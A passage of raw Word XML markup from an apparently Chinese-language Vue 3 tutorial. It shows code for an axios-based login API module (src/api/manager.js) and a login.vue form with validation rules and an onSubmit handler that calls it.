    <w:p w14:paraId="2744C5C9" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    baseURL: "/api",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146482E5" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE3A9E" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA97B63" w14:textId="2A1BBEC7" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>export default service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482BE4C9" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71503D05" w14:textId="45C23D03" w:rsidR="00DE164E" w:rsidRDefault="000F191C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新增</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>/api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419FB33E" w14:textId="1404AC68" w:rsidR="0034761D" w:rsidRDefault="0034761D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新增</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>/api/manager.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E41EDE4" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20FFE75F" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import axios from '~/axios'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145BEE9F" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25DE0BB3" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>export function login(username, password){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5273A5DF" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    return axios.post('/admin/login', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AF3FAB" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132A4CEE" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D5F6B7" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182B5963" w14:textId="2366A36C" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B778F20" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F8CB3FB" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3945850A" w14:textId="32E7F541" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>ogin.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的提交动作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>nsubmit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传参</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32500E15" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B026AED" w14:textId="75798BAE" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760A8061" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BEC0420" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7866EEE7" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { ref, reactive } from 'vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE8055D" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// import { User, Lock } from '@element-plus/icons-vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23227490" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { login } from '~/api/manager'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE7F7E" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21CDF40B" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>// do not use same name with ref</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751819CB" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const form = reactive({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A26BBF" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    username: "",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0C408C" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    password: ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5315239C" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D03EEF6" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF344A9" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const rules = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719DD372" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    username: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC5A444" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B9541" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            required: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD99C33" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            message: '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名不能为空</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664A5C91" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            trigger: 'blur'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCE133F" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C5394A" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A33D12F" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            min: 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ECB0F2" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            max: 5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334D0896" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            message: '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名长度必须是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4F1FB6" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            trigger: 'blur'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F804BF4" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EEAA62" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0B23CD" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    password: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48696423" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E336570" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            required: true, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C7418B" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            message: '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请输入密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2A52C1" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            trigger: 'blur' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B5871D" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D2493" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            min: 3, max: 5, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F40E85B" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            message: '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长度在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381EB371" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            trigger: 'blur' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD6BB5D" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DE92F0" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B7C4DA" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A07937E" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FB240BC" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const formRef = ref(null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346A3EB8" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AF4EB30" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const onSubmit = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF822E" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    formRef.value.validate((valid) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F61EE5D" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if (valid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B021C7C" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            console.log('submit!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0B8B73" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F1A2C7" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>login(form.username, form.password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FE8AA1" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            .then(res=&gt;{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54191043" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                console.log(res)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6091C902" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D9366E" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            .catch(err=&gt;{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F09F898" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                // console.log(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C92C8DE" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                // console.log(err.response.data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3630CAD6" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRPr="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
